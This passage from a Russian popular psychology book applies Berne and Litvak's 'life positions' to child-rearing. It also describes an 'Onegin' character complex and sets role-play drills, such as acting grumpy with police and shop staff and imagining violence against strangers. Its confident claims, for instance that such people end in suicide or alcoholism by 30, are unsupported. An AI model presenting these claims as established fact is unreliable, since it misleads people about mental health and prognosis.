те­ми, "с кем на­до", он ска­жет за это сво­им ро­дите­лям "боль­шое спа­сибо". А пос­мотри­те как ре­бенок от­но­сит­ся к тру­ду? Он ведь де­ла­ет толь­ко то, что ему хо­чет­ся, и по­луча­ет от это­го удо­воль­ствие (ТРУД+). Прав­да, не­дол­го. По­тому что по­том вме­шива­ют­ся ро­дите­ли, и зас­тавля­ют де­лать не то, что хо­чет­ся, а то, что на­до, при­чем на­до им, а не ре­бен­ку. И, ес­тес­твен­но, тем са­мым фор­ми­ровать ми­нус в по­зиции ТРУД. При­меча­ние По­чему "поч­ти каж­дый"? По­тому что не­кото­рых де­тей осо­бо ода­рен­ные ро­дите­ли ус­пе­ва­ют "ис­портить" еще на эта­пе внут­ри­ут­робно­го раз­ви­тия. То, как это мо­жет про­ис­хо­дить, и то, как это­го из­бе­жать, изу­ча­ет на­ука под наз­ва­ни­ем па­рана­таль­ная пси­холо­гия. — Ты чи­тать хо­чешь? Не, чи­тать поз­же. По­тому что сей­час мы пой­дем гу­лять. Ма­ло ли, что не хо­чешь сей­час гу­лять. На­до. По­тому что поз­же я не смо­гу. Ну что ты раз­ре­вел­ся? На вот те­бе кон­фетку. …По­нима­ете, ка­кой па­радокс по­луча­ет­ся? Из­на­чаль­но гар­мо­нич­ных лич­ностей (де­тей) вос­пи­тыва­ют по боль­шей час­ти лич­ности уже не гар­мо­нич­ные, с ми­нусом в од­ной или нес­коль­ких по­зици­ях (ро­дите­ли). А те­перь вслед за Э. Бер­ном и М. Лит­ва­ком поп­ро­бу­ем взгля­нуть на этот мир гла­зами ма­лень­ко­го ре­бен­ка… И еще раз прос­ле­дим, как на­чина­ют фор­ми­ровать­ся ми­нусы в по­зици­ях… Ра­зуме­ет­ся, для при­мера мы возь­мем не са­мый луч­ший ва­ри­ант вос­пи­тания, увы, встре­ча­ющий­ся слиш­ком час­то… …Вот я еще та­кой ма­лень­кий, и ме­ня дер­жат за ру­ки боль­шие "ве­лика­ны". Это — мои ро­дите­ли. А иног­да к нам при­ходят дру­гие "ве­лика­ны" — ро­дите­ли мо­их ро­дите­лей, мои ба­буш­ка с де­душ­кой и ру­га­ют мо­их ро­дите­лей за то, что они ме­ня неп­ра­виль­но вос­пи­тыва­ют. Прав­да, ве­ро­ят­но, ба­буш­ку с де­душ­кой то­же ког­да-то неп­ра­виль­но вос­пи­тали, ина­че бы они зна­ли, что при де­тях та­кого го­ворить нель­зя. Ну лад­но ба­буш­ка. Она хоть в ар­мии не слу­жила. А де­душ­ка-то дол­жен был знать, что стар­шие офи­церы не вы­гова­рива­ют млад­шим в при­сутс­твии их под­чи­нен­ных. Вы ду­ма­ете, что ес­ли я соп­ли­вый и в слю­нях, то ни­чего не по­нимаю. А я все по­нял. Я по­нял, что мо­им ро­дите­лям до­верять нель­зя. …Ма­ма, а ты пом­нишь, пос­ле то­го, как ты ус­та­ла на ра­боте, заб­ра­ла из са­дика, а ког­да мы приш­ли до­мой… Ты пом­нишь, что ты ска­зала, ког­да я поп­ро­сил­ся по­гулять? — Да что ж ты нам жить-то ме­ша­ешь? Как мне хо­телось вам от­ве­тить… — Я?! Вам?! А ког­да вы ме­ня за­чина­ли, вы ка­ким цен­тром го­лов­но­го моз­га ду­мали? Толь­ко тем, ко­торый от­ве­ча­ет за точ­ные дви­гатель­ные дви­жения? Ма­моч­ка, ес­ли бы я те­бя не лю­бил так, как я те­бя люб­лю, я бы те­бе ска­зал, что ты ду­ра. Нет, не в ка­чес­тве ос­кор­бле­ния, а су­губо в рам­ках тран­сакции В — В, т. е. не для оби­ды, а без эмо­ций, — толь­ко для от­ра­жения ре­аль­но су­щес­тву­юще­го фак­та. А за­чем, ког­да вы со мной го­вори­те, вы на­роч­но ко­вер­ка­ете сло­ва? За­чем вы го­вори­те "мя­мя" вмес­то "ма­ма"? Не­уж­то вы ду­ма­ете, что я вас так луч­ше пой­му?! Вы поп­ро­буй­те на сво­ей ра­боте так с кем-ни­будь по­гово­рить, и пос­мотри­те, как вас бу­дут по­нимать. Ес­ли бы вы чуть луч­ше учи­лись в шко­ле, то зна­ли бы, что я так го­ворю не из-за вред­ности, а из-за то­го, что у ме­ня еще нет не­кото­рых зу­биков, а те, что есть, — вы­рос­ли кри­во. А вы-то за­чем так го­вори­те? Ну лад­но — хо­чет­ся вам и го­вори­те, я уже на­учил­ся вас по­нимать. Толь­ко не оби­жай­тесь по­том, ког­да я бу­ду го­ворить так до се­ми лет. Это я не из-за то­го, что го­ворить пра­виль­но не умею, а толь­ко для то­го, что­бы и вам "жизнь ме­дом не ка­залась". Я ведь учил­ся вас по­нимать, ког­да вы сло­ва ко­вер­ка­ли, те­перь и вы по­мучай­тесь. Ес­ли чес­тно, чем даль­ше, тем боль­ше я вас не по­нимаю. Вы то сме­етесь, то пла­чете. При­чем, с мо­ей точ­ки зре­ния, со­вер­шенно нев­по­пад. Как деп­рессив­ные боль­ные в пси­хи­ат­ри­чес­кой боль­ни­це. Вот по­чему вы вче­ра пла­кали и го­вори­ли, ка­кой я ужас­ный ре­бенок, ког­да я под прек­расным лет­ним сол­нышком пос­ле чу­дес­но­го лет­не­го дож­дя, ког­да в не­бе си­яла ра­дуга, про­бежал по лу­же? Это я не от озорс­тва, па­па. Это я от­то­го, что вы еще не уби­ли во мне при­род­ное стрем­ле­ние ра­довать­ся сол­нцу, во­де и све­жему воз­ду­ху. Вот я и ра­довал­ся. А ма­ма пла­кала, а ты, па­па, ру­гал­ся. А се­год­ня, ког­да я кру­шил и ло­мал стулья, вы на­обо­рот сме­ялись. Вам, на­вер­ное, хо­чет­ся, что­бы я стал Ге­рос­тра­том. А по­чему вы все вре­мя го­вори­те "Не де­лай то", "Не де­лай это"? Ах, да, прос­ти­те, за­был: вы же не зна­ете ней­ро­лин­гвис­ти­чес­ко­го прог­рамми­рова­ния, и не в кур­се, что в инс­трук­ци­ях не дол­жно быть от­ри­цаний, а дол­жны быть чет­кие ука­зания о том, что нуж­но сде­лать. Ма­моч­ка, за­чем ты го­воришь мне, что детс­тво — счас­тли­вая по­ра? Ка­кая же она счас­тли­вая, ес­ли детс­тво — это рабс­тво? Не, рабс­тво, па­поч­ка? Ты вид­но, пло­хо в шко­ле учил­ся, ина­че бы знал, что раб — это че­ловек без прав. Ко­торый мо­жет де­лать толь­ко то, что угод­но его по­вели­телям, а не то, что он сам хо­чет де­лать. И ска­жите мне на ми­лость — чем я не под­хо­жу под это оп­ре­деле­ние? Ведь та­ким, ка­кой я есть на са­мом де­ле, я вам не ну­жен. Вам во­об­ще ну­жен не я. А то, что со­от­ветс­тву­ет ва­шим пред­став­ле­ни­ям о том, ка­кими дол­жны быть де­ти. Я с са­мого рож­де­ния по­нял, что я не со­от­ветс­твую ва­шим ожи­дани­ям. Вы все вре­мя хму­рились, ру­гали ме­ня. Я еще не по­нимал слов, но уже знал, что это вы на ме­ня сер­ди­тесь. При­чем бес­при­чин­но. Как жаль, ма­моч­ка с па­поч­кой, что вы в пси­холо­гии раз­би­ра­етесь точ­но так же, как я го­дова­лый в са­моле­тос­тро­ении. Ина­че бы вы зна­ли, что уже на­чали фор­ми­ровать мне ми­нус в по­зиции Я. К со­жале­нию, вы не про­чита­ли ни од­ной инс­трук­ции по вос­пи­танию де­тей, а за­то, ког­да вы ку­пили сти­раль­ную ма­шин­ку, инс­трук­цию как ей поль­зо­вать­ся вы чи­тали три дня и еще на ме­ня кри­чали, что я опи­сал­ся, по­ка вы чи­тали эту инс­трук­цию. А как поль­зо­вать­ся мной, вы ду­мали, что зна­ете… А пом­нишь, ма­моч­ка, как ты си­дела ря­дом со мной, и, са­ма се­бя ус­по­ка­ивая, го­вори­ла мне, ка­кие пло­хие па­пины ро­дите­ли, мои ба­буш­ка с де­душ­кой, по­тому что они те­бе в оче­ред­ной раз ска­зали, что ты ме­ня неп­ра­виль­но вос­пи­тыва­ешь. А по­том то же са­мое го­ворил па­па про тво­их ро­дите­лей, то­же мо­их ба­буш­ку и де­душ­ку. Я, прав­да, к то­му вре­мени уже по­нял, что в воз­расте трех лет раз­би­ра­юсь в са­моле­тос­тро­ении го­раз­до луч­ше, чем вы в пси­холо­гии, и до­гадал­ся, что та­ким об­ра­зом вы мне хо­тите сфор­ми­ровать ми­нус в по­зиции ВЫ. Вам вид­но од­но­го ми­нуса по­каза­лось ма­ло, и вы за­хоте­ли сде­лать так, что­бы я был пол­ностью на вас по­хож. При­меча­ние Мно­гие ны­неш­ние ро­дите­ли, ког­да че­го-то не по­нима­ют в инс­трук­ции по поль­зо­ванию ре­бен­ком, на­бира­ют проб­ле­му в од­ном из по­ис­ко­виков Ин­терне­та. А еще пом­нишь, как ты ска­зала, что все мои друзья — гряз­ну­ли и гру­бые не­вос­пи­тан­ные маль­чи­ки, и что мне, та­кому чис­тень­ко­му и оп­рятно­му, с ни­ми дру­жить­ся нель­зя? Я те­бе объ­яс­ню, ма­ма: это ты мне фор­ми­рова­ла ми­нус в по­зиции ОНИ. Ах, ес­ли бы ты зна­ла ма­ма, как мне хо­телось тог­да убе­жать с эти­ми гру­быми гряз­ну­лями в лес, пос­тро­ить там ша­лаш и по­сидеть ночью у кос­тра, встре­тить рас­свет, та­кой девс­твен­но чис­тый, и хо­тя бы ночь не ви­деть вас с па­пой. Да, да, ма­ма, это мне из-за то­го так хо­телось, что ми­нус в по­зиции ВЫ ва­шими ста­рани­ями уже был сфор­ми­рован. Прав­да, я не ус­пел убе­жать. По­тому что ми­нус в по­зиции ОНИ ты мне ус­пе­ла сфор­ми­ровать рань­ше, чем я убе­жал. С тех пор я не с кем не дру­жусь… Но зна­ешь ма­ма, хоть мне сей­час уже трид­цать пять, мне иног­да ночью снит­ся этот девс­твен­но чис­тый рас­свет, ко­торый мы с друзь­ями встре­ча­ем у кос­тра, все та­кие гряз­ные и без­за­бот­ные… Но это толь­ко во сне… По­тому что в жиз­ни я все та­кой же оп­рятный маль­чик, и "дру­жу" толь­ко с та­кими же оп­рятны­ми маль­чи­ками и де­воч­ка­ми, та­кими же скуч­ны­ми и боль­ны­ми, как я… …Про­дол­жать мож­но дол­го, но ду­маю, что чи­тате­лям уже все по­нят­но. Вер­немся в ка­бинет к пси­холо­гу. А это кто к нам по­жало­вал? Серь­ез­ный на­чаль­ник боль­шой кон­то­ры. У не­го-то что за проб­ле­мы? А, ока­зыва­ет­ся, не у не­го лич­но, а у его фир­мы. А проб­ле­ма в том, что его сот­рудни­ки не мо­гут се­бя нор­маль­но вес­ти с кли­ен­та­ми по­чему-то. Что ж, да­вай­те схо­дим к вам в фир­му и пос­мотрим, по­чему. Приш­ли, пос­мотре­ли, по­гово­рили. Все по­нят­но. Поч­ти у всех, кто за­нимал­ся ра­ботой с кли­ен­та­ми — ми­нус в по­зиции ОНИ. И ста­вить та­ких лю­дей на ра­боту с кли­ен­та­ми вряд ли сто­ит. Во­об­ще, нуж­но ска­зать, что проб­ле­ма с сот­рудни­ками, ко­торые жи­вут в жиз­ни по от­ри­цатель­ным сце­нари­ям — вещь край­не серь­ез­ная. При­веден­ный при­мер — очень лег­кий, по­тому что бы­ва­ют ве­щи и по­хуже. Что вы ска­жете, к при­меру, ес­ли у вас в фир­ме ра­бота­ют сот­рудни­ки с по­зици­ей "ТРУД-"? Ес­ли вы счи­та­ете, что быс­тро рас­позна­ете та­кого че­лове­ка, то, мож­но ска­зать, что это еще со­вер­шенно не факт. По­тому что че­ловек с по­зици­ей ТРУД- впол­не мо­жет быть круг­лым от­лични­ком в шко­ле и в ин­сти­туте, по­беди­телем ку­чи олим­пи­ад и т. д. и т. п. Как в та­ком за­подоз­ришь "лен­тяя"? А меж­ду тем, ес­ли во всех ос­таль­ных по­зици­ях у че­лове­ка плюс, то имен­но так и бы­ва­ет, и этот ком­плекс по М. Лит­ва­ку на­зыва­ет­ся "Ев­ге­ний Оне­гин", и вы­ража­ет­ся фор­му­лой: При­меча­ние Ком­плекс, при ко­тором у че­лове­ка ми­нус толь­ко в по­зиции ОНИ, а во всех ос­таль­ных плюс, М. Лит­вак на­зыва­ет ком­плек­сом "Твор­ческий сноб". Та­кие лю­ди име­ют уз­кий круг об­ще­ния, лю­бят свою ра­боту, и в прин­ци­пе, к при­меру, на ра­боте, мо­гут неп­ло­хо чувс­тво­вать се­бя в груп­пе, ес­ли в ней не очень мно­го лю­дей, и они с ни­ми хо­рошо зна­комы. Но но­вые зна­комс­тва для них в тя­гость, они ни за­водить их не уме­ют, ни что с ни­ми де­лать по­том не зна­ют. Это лю­ди мик­рокли­мата и мик­рогруп­пы. Я+, ВЫ+, ОНИ+, ТРУД- Вспом­ни­те Оне­гина. У не­го бы­ли хо­рошие спо­соб­ности, ему все лег­ко да­валось, что в ре­зуль­та­те при­вело к то­му, что "труд упор­ный ему был то­шен"… Вот имен­но нес­по­соб­ность к упор­но­му тру­ду и от­ли­ча­ет "Оне­гиных". Судь­ба та­ких лю­дей не­ред­ко пред­ска­зыва­ет­ся с ма­тема­тичес­кой точ­ностью. Сна­чала они по­казы­ва­ют очень хо­рошие ре­зуль­та­ты, из-за ко­торых учи­теля (про­фес­со­ра, ра­бото­дате­ли) так к ним бла­гово­лят. Поч­ти всег­да — это школь­ные и ву­зов­ские от­лични­ки, име­ющие крас­ный дип­лом. Но "оне­гины" — "вер­ху­шеч­ни­ки", т. е. ни од­ной про­фес­си­ей они глу­боко не вла­де­ют. И как толь­ко в том де­ле, ко­торым они за­нима­ют­ся, встре­ча­ют­ся ка­кие-то "за­ковы­рис­тые мес­та", над ко­торы­ми нуж­но мно­го ду­мать, они это де­ло бро­са­ют и пе­рек­лю­ча­ют­ся на дру­гое. А пос­коль­ку ни од­ной про­фес­си­ей ов­ла­деть вы­сокоп­ро­фес­си­ональ­но нель­зя без серь­ез­ных уси­лий, то, в кон­це кон­цов, лю­бой серь­ез­ный труд их ра­зоча­ровы­ва­ет и они… Пра­виль­но: ищут уте­шения в люб­ви. И к го­дам 22 — 24 ста­новят­ся неп­ло­хими ло­вела­сами. Прав­да, до се­мей­ной жиз­ни де­ло час­то не до­ходит (т. к. с это­го мо­мен­та на­чина­ет­ся серь­ез­ный труд) и все за­кан­чи­ва­ет­ся на эта­пе близ­ком к за­чатию ре­бен­ка или сра­зу пос­ле то­го, как под­ру­га "оне­гина" за­бере­мене­ет. Мы зна­ем нес­коль­ких та­ких "Оне­гиных", ко­торые де-фак­то яв­ля­ют­ся от­ца­ми нес­коль­ких де­тей, при этом, не сос­тоя в за­кон­ном бра­ке ни с од­ной из сво­их под­руг, по­тому что бро­са­ют их как толь­ко де­ло на­чина­ет бли­зить­ся к се­мей­ной жиз­ни. Или сра­зу пос­ле ее на­чала. Со вре­менем и лю­бовь уже не при­носит им уте­шения, т. к. они де­ла­ют это де­ло уже прак­ти­чес­ки "на ав­то­мате". В си­лу это­го на дан­ном эта­пе у "Оне­гиных" на­чина­ет фор­ми­ровать­ся ми­нус в по­зиции ВЫ. (Вер­нее, на­чина­ет он фор­ми­ровать­ся чуть рань­ше: ког­да те, кто ра­нее был ими вос­хи­щен, пос­ле то­го, как по­нима­ют, что эти лю­ди дол­го и упор­но ра­ботать не мо­гут, на­чина­ют в них ра­зоча­ровы­вать­ся. А на этом эта­пе он прос­то уси­лива­ет­ся.) И, как толь­ко у "оне­гина" в его фор­му­ле ха­рак­те­ра по­яв­ля­ет­ся еще ми­нус в по­зиции ВЫ, у не­го воз­ни­ка­ет ре­ак­тивная деп­рессия, ко­торая за­кан­чи­ва­ет­ся ли­бо са­мо­убий­ством, ли­бо ал­ко­голиз­мом и нар­ко­мани­ей. Как пра­вило, это про­ис­хо­дит к 30 го­дам.

Обя­затель­но поп­ро­буй­те се­бя в раз­личных ро­лях. От­но­ситесь к это­му как к за­данию, ко­торое прос­то не­об­хо­димо вы­пол­нить. Ни­чего страш­но­го, что вы так ни­ког­да не пос­ту­пали, и сам факт то­го, что вам при­дет­ся се­бя так вес­ти, про­тиво­речит всей ва­шей на­туре. Суть тре­ниров­ки имен­но в том и сос­то­ит, что­бы "вог­нать се­бя" в та­кие сос­то­яния, в ко­торых вы ни­ког­да не бы­ли. За­то, прог­нав се­бя че­рез мно­жес­тво ро­лей, вы смо­жете быс­тро пе­ревоп­ло­щать­ся имен­но в то­го, в ко­го на­до, а не в то­го, в ко­го по­лучи­лось. Здесь, для при­мера, мы при­ведем нес­коль­ко за­даний, спи­сок ко­торых вы без тру­да, вой­дя во вкус, смо­жете рас­ши­рить. Итак. Вы — мол­чун Се­год­ня вы весь день мол­чи­те. Ни­чего страш­но­го, что го­ворить нуж­но. Нас­тро­ение у вас се­год­ня та­кое мол­ча­ливое. От­де­лыва­етесь нез­на­читель­ны­ми "угу", "ага", "да ну" "вряд ли", по­жима­ни­ем пле­чами, иг­рой ми­микой ли­ца и т. д. Слу­шать дру­гих не воз­бра­ня­ет­ся, на­обо­рот, — вам се­год­ня толь­ко и ос­та­ет­ся, что слу­шать дру­гих, пос­коль­ку вы са­ми се­год­ня пра­ва го­лоса не име­ете. При­меча­ние Вы­ходить из об­ра­за при вы­пол­не­нии это­го или дру­гих за­даний до­пус­ка­ет­ся лишь в форс-ма­жор­ных слу­ча­ях. Вы — го­ворун А се­год­ня вы, на­обо­рот, ни­кого не слу­ша­ете, а толь­ко са­ми го­вори­те. Без умол­ку. На лю­бые те­мы. Пе­реби­вая со­бесед­ни­ка. За­гова­ривая по де­лу и не по де­лу со зна­комы­ми и нез­на­комы­ми людь­ми. Под­хо­дите к про­хожим каж­дые пять ми­нут ва­шей про­гул­ки по ули­це и спра­шива­ете, спра­шива­ете, спра­шива­ете… — Ко­торый час? — Как прой­ти к ули­це Ле­нина? — Мо­лодой че­ловек, по­дож­ди­те се­кун­дочку! Я так и не по­нял: для то­го что­бы прой­ти к ули­це Ле­нина, нуж­но по­вер­нуть нап­ра­во или на­лево? Днем на ра­боте то­же го­вори­те. С сот­рудни­ками, по те­лефо­ну, в ку­рил­ке, не­важ­но где, важ­но что­бы вы все вре­мя что-то го­вори­ли. Ве­чером иде­те к зна­комым и го­вори­те, го­вори­те, го­вори­те… Вы — брюз­га Се­год­ня вы — брюз­га. Се­год­ня вы всем не­доволь­ны. На­чиная от пер­во­го встреч­но­го про­хоже­го и кон­чая внеш­ней по­лити­кой, про­води­мой МИ­Дом на Ближ­нем Вос­то­ке. Вы не­доволь­ны си­дящи­ми на ла­воч­ке жен­щи­нами у подъ­ез­да, и сво­им ви­дом, осу­дитель­но на них гля­нув, да­ете им это по­казать. Че­го, мол, тут рас­се­лись, сол­нце за­гора­жива­ют. Вы не­доволь­ны кон­дуктор­шей в мар­шрут­ном так­си, ко­торая да­ла за­мыз­ганный би­летик, и бур­чи­те ей вслед "У би­лета уж но­мера стер­лись, я, на­вер­ное, пя­тиде­сятый че­ловек, ко­торый се­год­ня по не­му едет". И, вы­ходя из мар­шрут­ки, де­монс­тра­тив­но ки­да­ете би­лет на пол мар­шрут­ки. Ес­ли вы на ма­шине, то вы се­год­ня мо­жете се­бе поз­во­лить быть не­доволь­ным да­же га­иш­ни­ком, ко­торый ос­та­новил вас за пре­выше­ние ско­рос­ти. Ну и пус­кай, что он вам штраф боль­шой вы­пишет, вам се­год­ня глав­ное, что вы всем не­доволь­ны. И ког­да он вас ос­та­новит, из ма­шины не вы­ходи­те, при­от­кры­ва­ете стек­ло, и, как он по­дой­дет, не­доволь­но и раз­дра­жен­но спра­шива­ете "Что вам?". Пред­ло­жит прой­ти в ма­шину, не от­ка­зывай­тесь, но всем ви­дом вы­ражай­те свое не­доволь­ство, а вы­ходя из сво­ей ма­шины, с си­лой хлоп­не­те дверью. По­нимаю, что вы ни­ког­да так не де­ла­ете, но се­год­ня та­кое за­дание. Ни­чего с ма­шиной не слу­чит­ся от од­но­го ра­за. В ма­гази­не вы бу­дете не­доволь­ны кол­ба­сой, ко­торую вам пред­ло­жат. И пять раз поп­ро­сите ее по­менять. Знаю, что вы ни­ког­да так не пос­ту­па­ете, и что вам уже на треть­ем ра­зе бу­дет жал­ко про­дав­щи­цу, но что де­лать. Та­кое за­дание. Смысл имен­но в том и сос­то­ит, что­бы оп­ро­бовать ро­ли и пси­хоти­пы, в ко­торых вы рань­ше, воз­можно, ни­ког­да не бы­ли. По­тому что рас­ши­рить свой кру­гозор мож­но толь­ко уз­на­вая ра­нее нез­на­емое и нез­на­комое. При­мени­тель­но к нам, рас­ши­рить свой пси­холо­гичес­кий кру­гозор (в чем и смысл тре­ниров­ки) мож­но толь­ко вжи­ва­ясь в раз­личные ро­ли. Вы — прес­тупникА се­год­ня вы — прес­тупник. Нет, уби­вать и ка­лечить ни­кого не на­до, дос­та­точ­но прос­то пред­став­лять, как вы это де­ла­ете. Иде­те, к при­меру, по ули­це и пред­став­ля­ете, как вы наб­ро­ситесь вон на то­го муж­чи­ну, что­бы он… Ну что­бы не му­чил­ся дол­го. А вон то­го са­модо­воль­но­го пры­ща, на­обо­рот — чтоб му­чил­ся как мож­но доль­ше. В элек­трич­ке се­год­ня на сво­бод­ное мес­то ря­дом с ва­ми то­же ник­то не под­ся­дет, по­тому что всех про­ходя­щих ми­мо вас вы мыс­ленно из­би­ва­ете. И так его, и так, а по­том еще вот эдак. При­меча­ние При дос­ти­жении не­кото­рого уров­ня мас­терс­тва к вам дей­стви­тель­но ник­то не под­ся­дет да­же в пе­репол­ненной элек­трич­ке. Я этот фо­кус по­казы­вал сво­им зна­комым, еще учась в уни­вер­си­тете, ког­да в элек­трич­ке, в ко­торой нет сво­бод­ных мест, и лю­ди уже сто­ят, единс­твен­ные два пус­тые мес­та — ря­дом со мной. На них нет ни су­мок, ни га­зет, я ни­кому не го­ворил, что здесь за­нято, но они все рав­но ос­та­вались пус­ты­ми. Вы — жер­тва Ес­ли ва­шему нут­ру край­не пре­тило вче­раш­нее за­дание, то се­год­ня от­дохни­те и по­иг­рай­те в жер­тву. Из­ви­няй­тесь се­год­ня пе­ред все­ми по де­лу и не по де­лу. За вче­раш­ние ва­ши вы­ход­ки. В об­щес­твен­ном тран­спор­те ус­ту­пай­те всем, да­же под­рос­ткам. Уви­дели, что кто-то по­дошел к мес­ту, на ко­тором вы си­дите, тут же не­ук­лю­же вска­кива­ете, и с за­ис­ки­ва­ющей улы­боч­кой, чуть за­ика­ясь, про­из­но­сите: "С-са­дитесь". Ес­ли от­ка­жут­ся, — тут же из­ви­няй­тесь "Ой, прос­ти­те" и плю­ха­етесь об­ратно на свое мес­то. Как за что из­ви­нять­ся? За то, что от­влек­ли че­лове­ка сво­им "С-са­дитесь". При­дя на ра­боту за де­сять ми­нут до на­чала ра­боче­го дня, из­ви­нитесь пе­ред все­ми. За то, что опоз­да­ли. Ког­да вам ска­жут, что вы еще ра­но приш­ли, сно­ва из­ви­нитесь: "Ой, прос­ти­те, и прав­да на­путал…". И так да­лее. Вы — наб­лю­дательА се­год­ня вы — наб­лю­датель. Се­год­ня нич­то не ус­коль­знет от ва­шего бди­тель­но­го ока. И все, что вы наб­лю­да­ете, вы за­писы­ва­ете ак­ку­рат­но в блок­но­тик. Это и есть се­год­няшнее за­дание. Кто си­дел на ла­воч­ке воз­ле подъ­ез­да? За­писы­ва­ем. Ка­кие ма­шины ря­дом сто­яли? Пи­шем. Ка­кие у них но­мера? Пус­тые они сто­ят или в них кто-то си­дит? Кто си­дит? Муж­чи­на или жен­щи­на? Прос­то си­дит, или ку­рит, или чи­та­ет га­зету? Как ку­рит — нер­вно или с вы­раже­ни­ем без­мя­теж­ности на ли­це? В об­щем се­год­ня наб­лю­да­ете все — лю­бую, да­же са­мую нез­на­читель­ную ме­лочь. Ка­кая му­зыка иг­ра­ла в мар­шрут­ке? Сколь­ко че­ловек в ней еха­ло? Ка­кая при­чес­ка у кон­дуктор­ши? Бы­ли ли усы у во­дите­ля? И так да­лее. При­меча­ние В груп­по­вых тре­ниров­ках мож­но да­же со­рев­но­вать­ся в кон­це дня — кто боль­ше и ка­чес­твен­нее вы­пол­нил роль наб­лю­дате­ля. Вы — сно­ва наб­лю­датель Толь­ко се­год­ня вы наб­лю­да­ете не прос­то так, как вче­ра. Се­год­ня — вы наб­лю­датель пси­холо­гичес­кий. Се­год­ня вы всем ста­вите ди­аг­но­зы. Во­дитель, ве­дущий мар­шрут­ку — ин­тро­верт или экс­тра­верт? Флег­ма­тик или хо­лерик? По­чему вон та де­вуш­ка, на пе­ред­нем си­денье так нер­вни­ча­ет? Прис­матри­ва­ем­ся. Нет, не из-за то­го, что ку­да-то опаз­ды­ва­ет — эта, ес­ли бы опаз­ды­вала, глаз бы с ча­сов не спус­ка­ла. А она на них и не смот­рит. А нер­вни­ча­ет силь­но, вон па­кет в ру­ке как из­мя­ла… И смот­рит то в ок­но, то ку­да-то вглубь мар­шрут­ки. На ко­го это она там смот­рит? Приг­ля­дим­ся. Су­дя по все­му вон на то­го муж­чи­ну. Ко­торый то­же нер­вни­ча­ет. Толь­ко по-муж­ски: сер­ди­то так нер­вни­ча­ет, раз­ве что на пол не спле­выва­ет. Се­мей­ный раз­дор? Впол­не мо­жет быть, тем бо­лее что выш­ли они на од­ной ос­та­нов­ке, она чуть ли не вприп­рыжку бе­жит впе­реди, а он до­гоня­ет ее, ут­кнув­шись взгля­дом в зем­лю. Бег по кру­гуА те­перь да­вай­те ус­ложним за­дание: ес­ли рань­ше нуж­но бы­ло по­быть в оп­ре­делен­ной ро­ли один день, то те­перь толь­ко час. Но — пос­ле то­го как этот час прой­дет, нас­ту­пит дру­гой час, в ко­тором бу­дет дру­гая роль. И так в те­чение все­го дня: час — од­на роль, час — дру­гая. Ког­да на­учи­тесь хо­рошо вы­пол­нять это уп­ражне­ние, служ­бу вам это сос­лу­жит уди­витель­ную: уме­ние быс­тро пе­рек­лю­чать­ся меж­ду раз­личны­ми сос­то­яни­ями вещь слож­но­пере­оце­нимая. А те­перь еще ус­ложним за­дание. Приг­ла­сите нес­коль­ко дру­зей, ес­ли вы за­нима­етесь в оди­ноч­ку и у вас нет пар­тне­ров по за­няти­ям, пос­тавь­те их в ряд или в круг и с каж­дым по пять ми­нут по­гово­рите. Но с од­ним вы го­вори­те как флег­ма­тик, со вто­рым как ме­лан­хо­лик, с треть­им как сан­гви­ник, с чет­вертым как хо­лерик, а с пя­тым вы го­вори­те в ро­ли сер­жанта, ко­торый "обу­ча­ет во­ин­ско­му ис­кусс­тву" не­опыт­но­го но­воб­ранца (см. рис. 5.1 из се­рии ка­рика­тур "Ма­нера го­ворить"), с шес­тым — как не­опыт­ный но­воб­ра­нец, слу­ша­ющий, что го­ворит ему сер­жант и прок­ли­на­ющий про се­бя его в час­тнос­ти и всю ар­мию во­об­ще и т. д. Вот так, быс­тро ме­няя ро­ли, пе­рехо­дя от од­ной к дру­гой. А ког­да ос­во­ите и это уп­ражне­ние, для тех, ко­му пон­ра­вилось, пред­ла­гаю два сле­ду­ющих. Пос­тавь­те ва­ших пар­тне­ров друг про­тив дру­га, са­ми встань­те меж­ду ни­ми. И на­чинай­те го­ворить. Сна­чала с пер­вым, стоя к не­му ли­цом. Го­вори­те с ним, до­пус­тим, как ти­пич­ный хо­лерик, кри­чите на не­го, оре­те, что сил есть, са­ми се­бя за­води­те и са­ми вы­ходи­те из се­бя… И — раз! — быс­тро по­вер­ну­лись ко вто­рому пар­тне­ру и с ним го­вори­те в пря­мо про­тиво­полож­ной ма­нере: про­сящим из­ви­ня­ющим­ся го­лосом веч­но­го дол­жни­ка… И — сно­ва быс­тро к пер­во­му ли­цом! — и сно­ва кри­ки, воп­ли, ру­гатель­ства… И так да­лее. Глав­ное, что­бы на ва­шем ли­це, в ва­шей ми­мике, пос­ле то­го, как вы по­вер­ну­лись ко вто­рому пар­тне­ру, не бы­ло и сле­да от той ро­ли, в ко­торой вы го­вори­ли с пер­вым. И пе­рес­тро­ить­ся нуж­но в те­чение по­лу­обо­рота. В этом и суть тре­ниров­ки. Не бу­ду скры­вать, это не прос­то. И дос­ти­га­ет­ся это не за один день. Но, опять же, дос­тигнув, ни­ког­да об этом не по­жале­ете. По­тому что при­менять это уме­ние мож­но где угод­но. Хоть в тех же улич­ных раз­борках. При­меча­ние Пов­то­рюсь еще раз в си­лу важ­ности мо­мен­та. Уп­ражне­ние не­лег­кое. Как не­легок лю­бой труд, от ко­торо­го сле­ду­ет силь­ная от­да­ча. И ес­ли его де­лать "на­поло­вин­ку", то луч­ше не на­чинать де­лать во­об­ще. По­тому что от не­вер­но вы­пол­ненно­го в "бо­евых ус­ло­ви­ях" при­ема мож­но очень силь­но пос­тра­дать са­мому. Ес­ли вы при встре­че с те­ми же ху­лига­нами бу­дете, ска­жем так, "не­ис­крен­ни" в сво­ей ро­ли, то луч­ше и не на­чинать ее иг­рать. По­это­му в та­ких тре­ниров­ках очень важ­ны пар­тне­ры, ко­торые ука­жут вам, что вы где-то не до­иг­ра­ли, что пре­дыду­щая эмо­ция не ус­пе­ла уб­рать­ся с ли­ца, что вы за­ика­етесь, нес­мотря на то, что вам ка­жет­ся, что вы кри­чите, и т. д. Сле­ду­ющее уп­ражне­ние. Поп­ро­буй­те часть фра­зы или пред­ло­жения ска­зать од­ним то­ном, а вто­рую часть это­го же пред­ло­жения со­вер­шенно дру­гим. Мо­жете по­том при­менять по наз­на­чению к оха­мев­шим то­вари­щам. К при­меру, фра­за: "Са­ша, по­жалуй­ста, я те­бя очень про­шу, ни­ког­да так боль­ше не де­лай". Это вы го­вори­те Са­ше, ко­торый вас в чем-то толь­ко что силь­но ос­корбил. Ска­зать это мож­но так: пер­вую часть фра­зы го­ворим с вы­раже­ни­ем ве­личай­ше­го бла­гого­вения к Са­ше, с вы­раже­ни­ем пол­ной по­кор­ности на ли­це, чуть за­ика­ясь от осоз­на­ния его ве­личия в этом ми­ре, пе­реми­на­ясь с но­ги на но­гу, 